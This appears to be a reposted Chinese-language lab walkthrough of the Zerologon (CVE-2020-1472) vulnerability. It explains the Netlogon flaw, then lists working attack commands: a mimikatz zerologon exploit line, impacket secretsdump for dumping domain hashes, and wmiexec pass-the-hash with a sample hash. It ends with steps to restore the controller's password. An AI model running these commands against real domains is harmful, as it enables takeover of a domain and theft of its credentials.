漏洞概述:
這是近幾年windows上比較重量級別的一個漏洞,通過該漏洞,攻擊者只需能夠訪問域控的445埠,在無需任何憑據的情況下能拿到域管的權限,該漏洞的產生來源于Netlogon協議認證的加密模塊存在缺陷,導致攻擊者可以在沒有憑證的情況情況下通過認證,該漏洞的最穩定利用是呼叫netlogon中RPC函式NetrServerPasswordSet2來重置域控的密碼,從而以域控的身份進行Dcsync獲取域管權限,這個漏洞的完整利用需要域控開啟135和445埠這是近幾年windows上比較重量級別的一個漏洞,通過該漏洞,攻擊者只需能夠訪問域控的445埠,在無需任何憑據的情況下能拿到域管的權限,該漏洞的產生來源于Netlogon協議認證的加密模塊存在缺陷,導致攻擊者可以在沒有憑證的情況情況下通過認證,該漏洞的最穩定利用是呼叫netlogon中RPC函式NetrServerPasswordSet2來重置域控的密碼,從而以域控的身份進行Dcsync獲取域管權限,這個漏洞的完整利用需要域控開啟135和445埠
注意:漏洞利用成功后是把域控這個機器用戶的密碼置為空,與域管的密碼無關,
實驗環境
域名:HIRO
域控:[email protected] 域管:hiro\administrator
驗證
用zerologon_tester.py驗證是否有CVE-2020-1472漏洞
攻擊:
1.使用CVE-2020-1472exp(需要先代理)
這一步會把域控的密碼置為空 #即hash為31d6cfe0d16ae931b73c59d7e0c089c0
自己本地驗證看攻擊是否成功(ntlmhash為空)
前后對比
2.使用mimikatz(要用支持zerologon的版本)
(1)如果當前主機不在域環境中,target指向ip
lsadump::zerologon /target:192.168.228.10 /ntlm /null /account:win-kong$ /exploit
(2)如果當前主機在域環境中,target指向FQDN
利用(使用impacket包)
攻擊成功后讀取域內密碼hash(域控機器賬號有DCSync權限)
python3 secretsdump.py hiro.com/[email protected] -no-pass
哈希傳遞(administrator)
python3 .\wmiexec.py hiro/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:e9bf196dc93a1219e3b2e79b1b7aa36e
恢復脫域的域控
在攻擊程序中,將機器的密碼置為空,這一步是會導致域控脫域的,其本質原因是由于機器用戶在AD中的密碼(存盤在ntds.dic)與本地的注冊表lsass里面的密碼不一致導致的,所以要將其恢復,將AD中的密碼與注冊表lsass里面的密碼保持一致,
像服務器一樣,DC擁有一個帶有密碼的機器帳戶,該帳戶以加密方式存盤在注冊表中,引導時將其加載到lsass中,如果使用Zerologon更改密碼,則僅AD中的密碼會更改,而不是注冊表或lsass中的密碼,利用后每當發出新的Kerberos票證時,DC無法使用lsass中的機器帳戶密碼來解密服務票證,并且無法使用Kerberos中斷身份驗證,
恢復域控機器密碼:
在域控上執行: powershell Reset-ComputerMachinePassword
最后對比
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/285673.html
標籤:其他
上一篇:npm是什么、npm的使用方式及如何解決npm被墻的問題
下一篇:談談自己學習半年編程的體會